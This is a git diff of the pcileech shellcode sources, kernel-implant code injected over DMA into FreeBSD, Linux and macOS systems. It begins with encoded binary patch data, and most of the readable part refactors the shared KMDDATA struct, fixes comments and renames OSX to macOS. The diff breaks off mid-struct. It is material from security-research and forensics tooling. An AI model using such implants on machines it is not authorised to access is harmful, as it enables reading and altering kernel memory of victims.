zP&nOHa3DQeT*Lpnrkst3lQHl2q&-gev9SG5Ee>uxvGbZ1hxe!URLE3c7oBU-`^Byk
zT{5-lvKGgVue5%3^rl=nbNS-R2`vVW-FDwATAY0G-=a*5!L#$mj%hJeQ8Kh!i}Qb4
zUi@t>hR6T$iLJ%Og}vSTwHWzY$&3;$Mr*v`yF*%J4^&+n(PI4XtCsyyi;1RvLlZLf
z++?kN&Ymq(@hjQ29!@(sHPP>Ex)e?|`eL>A22ZX1Y<aEyg7+c&S%0nlw~hUS>F3?^
zrZrr19N9U(y*S<NzN1hq9!>YV<5ND;Azw@3AvtY9LA<6-GL%^t7N3$@lqcQy^Xb<7
zd3swHB>CjafAUMau0e}MPQ9C!0lO~ZXmKweXi{0%<kV|X&4)TIf>GLN5t8<bm=;nV
z>G?p5@X|7CffkVuZpfq->u9+`i-xwiOwzPbCI-A(G;Qb~9MqyYST7S=M8{)&Q7u}S
zTn-qsFQis!(K_tZ2efF@R+KBz&gBSd)j^YLtH9D~3nCL`TA4x1M4wx$t;pm`tL^-6
zEoZ=LC#q{=ByqI|$_7*1Yl=~ds@v2eruLetnTG0ssWq8e4=R(XuvQ0=FJiVHMq!^6
zTJ<6(liD#9@&&17OfADnsR7jNt7I@IP3=_N6bEy~0L39>|J+lc)p=xD$&gmVy!-qb
zT{QBV^Bh5z#hj~A-pf^{RjVwzOWF);9OZ{Kf$R=*?w1iWGefH@28kog%%o+-znmKL
z)@rV$DnemjgQJxj)w_Ec%uF+X?4^|lB?e*}w3>yuT!UJbBWVw?^;VQ@ARmfRTFIyf
z`HW)a4{PN&?Gob=tri*CpK7h*0T?`aZMRnUqU)vRdRC&rj%_owG7G{SnR;HUAd)&b
zq*Vw#bK}r#t)!`?V&htckq(}JTB`^esyKaAt957^qt>b+w{@5~YD8}YdN^<s3SPV#
z=fKU-6*dQsqLJB8T-B-td3118s~9?1`>hYPYDGGjov&3J`sws6XV;FnJ5dL+&)N)Y
z3o>^qAw=1+>&)d=<Z#y#LS*h;LWts*q}{019_Y)3YcFc?Md`2`*{!}9Aw=9EOxywV
zn7K(*Pp&rZCxk}!+w5@|rPlcZgfLf2b`V0uiy>rC#J~6yAw)!`ln};YXS>;D5Eb%A
z2>HLM_=pK1;zcTk(c6rH5F&qW2qQ=)8-0WjdDfdKXVG{dafA>ea}#Pcff(ThLWoMY
zyg}`XsaeOZI4Oi~8fay?IM$i$>x2+Fj-v=6%9L(-i4Y=QwDXvDD`H_nXjIomtsEtq
zeO^Ln+S$@W2vLo_)=dae=SL3H?>Aem&W{Npa^h3X2m`R{wEYetM7f1dRie%A5a(Wv
zPJ}Ah8bo6(ql6G;YEx?oA&SbvAwr14sW9^qK|!a!k`N-M`XNGy=(&v$BAbPQ5W3<N
z3u+i)GsUra333}n`H5>mR_lG7UCiuqCcA_XqWsLXp-k&Mrn((Xrzs&cTkC`Du?6L4
zrpstWjM`SCT624DM-`IWGp=^Rs&mhtBZMe%w2N-`B3=Zf8>vSe;`17Eq<w}EqU;8f
z>YjX!03Sp?X%cW44Fn$TCxj@sl&fPXpNb61pWFblWZcB!By2U$AvK83WIwn;2oV9u
z5JI!H#cUl$^|^KzQC-Z`M$iKuc|RdUHSSH*2_ZVdgb+exCWH{8v6bd>Ue2|XDMILC
z{aYI~qn@Nldf3G({O?sPLP7IHQ*IQw)5K>c;xL_r5REuf*<+Te<q}YiYN|5N5JEJi
zrkAZ=M7%?U5LIN%qU}eLSg`&rg16)j5<qR_f)Ju0v0x=c9<E6!`Fb@Zf&AapWllVV
z&SZ~Il0d{`p0fy}fxrglK7#W1<~rn-NsiTke4dB7{Edi(7{!~Qebsc>j4nv~Jraoe
zuI_fR45Dy$3I~ZH$LZTn0ue9fuMMp_=n(yOBvW>l1fmi?kU(Tlm<M4Oa?4bN1m<Lp
zu^nX-*W;vUCnQ-VBoO5vO?#19BDCs8tuL6fdky8Eod-}jWu~eJ1^7Bc0*%Ve9*2=7
z`)((JXxC?dy@zEG-TcJOzh@al`JM+*{3sWP1VSs>PB()n7&0**LeieXnVd&<mzxD~
z*tBC}Sq9PSd;(F2+dP#=%~n~AvdDu;AWA-HR;UT1n@sL5qt#I}=U3v8t#mkvJTkSO
z1QwAtXT67I5K(F(frwGj%}kV9-N54KF$$Trdlq5`dMQW8xxq*vV*KZ1?~_k%-faHJ
zBDL)DNghNsZQ;}r4iu;VkXbc-rVEwXB$J&T?ATYt97)pXrC@H@T659-G@4GIES{#P
z_pfpF0%pfC!N~4K%okUx67}Y$q#AMkSP6qjvO<$w<mdX4+#=S$;-_!WO_-vS+Z;h&
zE6nVyL+2L%f#tRVopRPQ&PJ5)rU~V{X-37H&4Ls~`CeL3zLyxv_tJ{;y|f`7ygq%a
zYKKkI=KknFJb4-a7BmofEPY}2?XGBXdUAH4Y{=}9{KZ76`6d@m?e+1Udik8WhZ^Us
zDVX#93CA&c^s+w6)J~uIUYH&EH2qGw`0_VJD*CGV9!@>?yW*2oqUwDu#(pp|bt%6q
zPEyz6v-$hvK7Lp575ZPVzA$+4=+|@Q&tLpe17Ezao%_x9hqQ1W{^323Xi>QBt*4&S
zV(J&i|6HuajL$0%?bD+4)Vn`!(V{GwXc^OD&da---_vn1cVXtu16s^q=I?LU;*Nzw
zOZWo)jStr>dsmB!$HPS%wYYoVw(fo{7Wbb2W|tOABh3eYqD9rmryswh#qz)SE`6@W
sirGu9|5A&U_kE`%`v1R2?qrl-{T^Xr`25vRk{SQ=o8*vp?ylnh0K1PBrvLx|

delta 4436
zcmYkAeQaCR8HaD2k6NW`ytWiG+F^>3ytZQ=E#RuDa8RtAwk{Z@q|q9{YyoAg+brs8
z0irpndsw_%k3fnNi59%Urbz3gh!*W8?TVqLC(zJFqhbXLbilw`GsvV4N<Z+P_Zk8I
zBj>rl``&Zk^Pb;5_nzpL&o!>Paqd*ZYa>mI){Xyl;pWet`sJ>{_<=1i74}8mzV>|f
z$=kCJ-t^lIRaWKq?iH2x!6lWp<I%>eA5GMJr&ZZ!RQ7{um7NNd>iw3b><{leSRXiX
z@X@W$RrL)-s`@>XmkzvA74_U-H!#aH<XJj@;7^{oXRv4BjOQay@7z6aSI_iR6$VPR
zjr?6)_iE;LmG5*^?^KkVJ9ix3abD%t2LmeC6bz|+JCwiKt4vcc@^pS^iO6AP{}<7x
zOswy*|HbBt7JYsWnL3|8ez*_WdHtr^YeiPX`2`ZrfoAJTp*AG9_oQ>?Wb?Gjpmm~!
z<Yda(|J@s&66!(<t6Z#yHbUF)yt?r8eqab8N?UN2%$^(sh7lC)2yKG4=uCb5kqwL^
zw9!sFi=D#LzzKvT?J3$$+G*NU2C$srmFG_ZUX(6cpYxwJt6l^AD!;Xdk%1IqYhMM!
zPIA}eG+KngmcBLnlG(Ip8v{RRq7B_0uerl+@hbah=@?Z}_9ZI6(Wi1%D*H**mVd?b
zJA+c|)%Hf;YI}3ozuJB%u-bnAj)M~u%08rWZC;g25#QyH=aPZj8(SMUsQj>Vu3To8
z!gT|s8CMU?_GapS%A{<n*)!l>RF&x^GZUM~&E7CE|FV}=&cqgYSJ*=)79i)ei3Jzs
z<R~N~FtMff+Rn0xg(XcBTfR0~ZZWY42Ww5NAysbinpl*BE)#3wfD4qJ?cok_t{ye9
z#O^n5oNHq1twnEsVPb7eqQtb@**;>DQZ5tg@T%+~6YC6YJUC%un^dknXksbGMl$K3
zZvz)}Wv5aHOsu<;q>S#7)a*BGqqjk?=WjV-v=qGDLYeh;$Ud738{H2r`_x2@-T^gO
zRhG%<A&{%*8og6s#j{?c3lN1)8~qIAm%-^_D5Y|AxEpG7wGoI}N81Y}T+R6^Za<WC
zdoDsM-xM_Z5R|~CMvp^5m5D7gdIF^I-9}G}7!~a}RFom>6QV_yy=?SJ$lmI!GWrxm
zmpP+9piKwEPzmDEGe%Fj6d-OI;#W5M3{8t)7mYp(rLST3^aabxa7lvvWw^O)KgFzp
zq##Cnp=z~a#OPU&92xE7Z(62a&x7K@HoEphE#3p%ZUH108y$e`V|YUcp=dncZgdC=
zrtHH;FNMU#MrXn<ZuT3!+@<&LGCBg`=?SA7Ab0+C6!LCRS)-evseq)QpmSne9f!uw
z4_-7n0o9ilePQ%^s9YZFF}e+UWY%S*)ehxm$hAr6NNG-nz>Z4b{YG~}U+kGr;3f%d
z#+y0?*+)u@E-h#2(daJdXOl}_F}fR4xn@SvBSau3gr+Z+sZ1X<mi{x=+Yap}5EDW;
z>If!;GNpGf5;z2w$L_rx6GCrpk(n((&F(m#fsT}pGP+@jE03MSgwUWTPJ$y)t~mtl
zg~;G<MmrE0km`Qu(|?aq{vt#MBy&i}O?5m2?sjvXfX3$EL)ViKs|dLshazsSC!o?3
zlIlsQJT|f#6GGpA%QYd?9F?+`pd+Q<lIoPimB+5cgwO*sOC)#($~7zKEJOwmWN;x!
z28fmiu{}tJH4qsjFriTPPyiD`cVP=m=xS3TOekc(z_orTzh16g;A**kObGEK=^&H{
z$uks!bTM6z38CIhw_Fkit4RYBLR)G_ne7O~k1;hsFUXRlqfp3Ap$V!OQ$fB~F=iZ^
z3TH<#AtdVxCWOcki?%`a+s4q^MY9e-Nlyk>6MzX3Daao&Ayh7xH710L_1n-=?j;hJ
zmN;2ab(gEfNw8bAKDk|wXe!%*387#>((i+muMye~-RAB6Cnki-Gq@t7cYwX`m1kf=
z$g)=A>Yb4NqReLjTHE<6FDoI`WFKbb8itm<c)A)BLa}8<yf6agZ|fw%y-@XJJdX*X
zcrZ%&_d_j87M~)N=3@jCLUteHXDI|NTb9QOD5|O&F(KqVy^yjVhxSoTRziuh(hZmp
zsyO%*w3KqO5<<-E)tC?(ohesLLA(a=(KMuNyAKnJ#sMbuu>MtwdBGJWFRPlh$*Y!N
zLP+`4N=yhH-8@b*v!F^cK8P7*n&v@k-4y&#C9MTe>4Kyca5Y|GIw<7&C<KM?<n5+2
zOTlQ1*e48C?6VxI*e3#2?9%|%Z_|t^DjFgyA#|j4m?ca>Sf+>xq4WcCHUSN|u2>Jr
z;4vZ8!vQ9Qlznr?hYJN)G&08>(3Y8_Gch5=kNh`5Es4`>Fd@`rOI#XKOgAPJ%62fi
zZYW^My!SxNI|beb*=v*6U_!_>oZb#K_MW2Wekg+p3ETlzPc~BOA*gtN9S+zDIXoRk
z7a*%?38Q-kDz~&z^kJx&Ucj}xAtsi%5sAY{m=GcZ9%Bb;^kw&9La0*JqQuqfhcICV
zWa{W<9O407fe9g|4s8<39tv;7giz&`bONe8`6nUwt3;oI+z%7|0hFDRH);v8c{^c3
z=nZ8b!-UY-xj_#mgyN-NpU>bzkcG0qN(k|zgjS7ZttpfzF(IV#b_o+gv)yXVg6wHo
zczqC`p7?v7OL7xGRJu}@>IG0)*|RYrq_U&lcz#s6#*6%A!Lu@}<&qFb_1m^tV>Rv~
zxRgVQ$CFS;Fv11Pp}6}A6M@2fL9#Fk`K7xkWT~;M@Fev3C+}W|C!sm_%y}M9LUJ=a
z3GH*|bUkF{x-)ds21c9Yjo1z;yN>E5A-m7Z1a?Ru6~~j%?|P)0O`<8g2Twv?H|aE_
zYAyWSC1>3$x}k?F3!`W%_ia2Wars-i@FbK`_QQRwjB*+sQ$jhPVh(mdt;upLo`jH~
zolwe6wE)pgC!T~Vl^KS@<yKPI4do6Dk?IIUBsSO!9W6b39#2A*r*(e@+~SkdMfdd0
zoId297HwR#a%&V%LZ|tb#*<K;$~t%ws*L>vWToX}_awyQ7~<_LT0CFN!U#3-;esbC
zX9IZBJ!>Duf79TyzstMv3{-9n(9PLOAl+PW1Em|QmT7W76>1=ELN{K>irYt77@<lp
zKB&^mJc##s5>G<PPBYmHpiUOSdod;GP26=@F9HVk&AZA|T{rN~yztzVMCTr!uBXeQ
z?0VR{Ty^Oco{5P)4VT_pb=mbFm&;P|0Bfzv?+D6gcxnGf1AmwwlTGQck|(-%N<NI7
zHL;cd_{P4}-GF-CUFnZc&A3rEjN#G6lh=pYzxhP&eC+3K?ETo7I#=#eyMz?y`~nH*
z_YX~+6ly~X2qb}!Kne(}T;}V2Cqk5+UV&E8jyRu1_RwF<L0}6IE7Ec&cA2^CrqjSz
zyG-Ya!H#1HB_cX$r=7*cXNQ5a2q{{eSJ`dCfv-23Vdt&Pt*c%_jC{T2jDr0X2sPpC
zdZcg=XhV~w5KKDG@$dBkooK@qE#=I={^D=Yy3h))rh90d_g=aCLzQ#)R#L03qkrjN
z$8M}|!%wdJ5$(_;&t>kr4;cRZz}vO7<1fGTi%qoNRiT63Dz}a*t_yLjWT#8tGI6*~
zZhONIXERiHi{}3Gz<DS5;b+fZE&(}rk4CstIV#Y6xlLXy$~U*k3%}ea%iMptPyWU>
LdC&A^kJtVmmUcRg

diff --git a/pcileech_shellcode/fbsdx64_common.h b/pcileech_shellcode/fbsdx64_common.h
index a4dfb9e..3303f49 100644
--- a/pcileech_shellcode/fbsdx64_common.h
+++ b/pcileech_shellcode/fbsdx64_common.h
@@ -27,7 +27,7 @@ typedef unsigned long			STATUS;
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
@@ -38,11 +38,11 @@ typedef struct tdKMDDATA {
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
diff --git a/pcileech_shellcode/fbsdx64_stage3_c.c b/pcileech_shellcode/fbsdx64_stage3_c.c
index ac7ac26..de8378c 100644
--- a/pcileech_shellcode/fbsdx64_stage3_c.c
+++ b/pcileech_shellcode/fbsdx64_stage3_c.c
@@ -1,7 +1,7 @@
 // fbsdx64_stage3_c.c : stage3 main shellcode.
 // Compatible with FreeBSD x64.
 //
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 
@@ -55,30 +55,30 @@ typedef struct tdFNBSD { // function pointers to BSD functions and structs
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	FNBSD fn;						// [0x300] used by shellcode to store function pointers.
@@ -217,4 +217,4 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
 		pk->_op = KMD_CMD_COMPLETED;
 		idleCount = 0;
 	}
-}
\ No newline at end of file
+}
diff --git a/pcileech_shellcode/lx64_common.h b/pcileech_shellcode/lx64_common.h
index 072ed62..ee71a39 100644
--- a/pcileech_shellcode/lx64_common.h
+++ b/pcileech_shellcode/lx64_common.h
@@ -35,33 +35,33 @@ extern QWORD m_page_to_phys(QWORD p1);
 extern VOID CacheFlush();
 
 /*
-* KMD DATA struct. This struct must be contained in a 4096 byte section (page)
-* at the most. This data struct is used to communicate between the inserted
-* kernel code and the DMA reader/writer.
-* VNR: 002
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
-	QWORD _status;					// [0x030]
-	QWORD _result;					// [0x038]
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _status;					// [0x030] status of operation
+	QWORD _result;					// [0x038] result of operation TRUE|FALSE
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	PVOID fn[32];					// [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/lx64_stage3_c.c b/pcileech_shellcode/lx64_stage3_c.c
index 3d71c3d..495f0e0 100644
--- a/pcileech_shellcode/lx64_stage3_c.c
+++ b/pcileech_shellcode/lx64_stage3_c.c
@@ -55,30 +55,30 @@ typedef struct tdFNLX { // VOID definitions for LINUX functions (used in main co
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/OSX).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	FNLX fn;						// [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/macos_common.c b/pcileech_shellcode/macos_common.c
index cd84620..e8b9fa0 100644
--- a/pcileech_shellcode/macos_common.c
+++ b/pcileech_shellcode/macos_common.c
@@ -89,7 +89,7 @@ BOOL GetMemoryMap(PKMDDATA pk, PBYTE pbBuffer4k_PhysicalMemoryRange, PQWORD pcbB
 QWORD MapMemoryPhysical(PKMDDATA pk, QWORD qwMemoryBase)
 {
 	for(DWORD i = 0; i < 512 * 8; i++) { // PT*8 -> Pages (16MB)
-		((PQWORD)(pk->ReservedKMD + 0x2000))[i] = 0x0000000000000003 | (qwMemoryBase + 0x1000 * i);
+		((PQWORD)(pk->ReservedKMD[0] + 0x2000))[i] = 0x0000000000000003 | (qwMemoryBase + 0x1000 * i);
 	}
 	PageFlush();
 	return 0xffffee8000000000;
diff --git a/pcileech_shellcode/macos_common.h b/pcileech_shellcode/macos_common.h
index 649a131..83955e9 100644
--- a/pcileech_shellcode/macos_common.h
+++ b/pcileech_shellcode/macos_common.h
@@ -63,30 +63,30 @@ typedef struct tdFNMACOS { // function pointers to macOS functions (used in main
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	FNMACOS fn;						// [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/macos_stage3_c.c b/pcileech_shellcode/macos_stage3_c.c
index 7896b3b..f6ab241 100644
--- a/pcileech_shellcode/macos_stage3_c.c
+++ b/pcileech_shellcode/macos_stage3_c.c
@@ -85,7 +85,7 @@ typedef struct tdPHYSICAL_MEMORY_RANGE {
 	QWORD NumberOfBytes;
 } PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
 
-typedef struct tdFNOSX { // function pointers to OSX functions (used in main control program)
+typedef struct tdFNMACOS { // function pointers to macOS functions (used in main control program)
 	QWORD _kernel_map;
 	QWORD _PE_state;
 	QWORD IOFree;
@@ -98,7 +98,7 @@ typedef struct tdFNOSX { // function pointers to OSX functions (used in main con
 	QWORD memset;
 	QWORD vm_protect;
 	QWORD ReservedFutureUse[21];
-} FNOSX, *PFNOSX;
+} FNMACOS, *PFNMACOS;
 
 #define KMDDATA_OPERATING_SYSTEM_MACOS			0x04
 
@@ -106,33 +106,33 @@ typedef struct tdFNOSX { // function pointers to OSX functions (used in main con
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
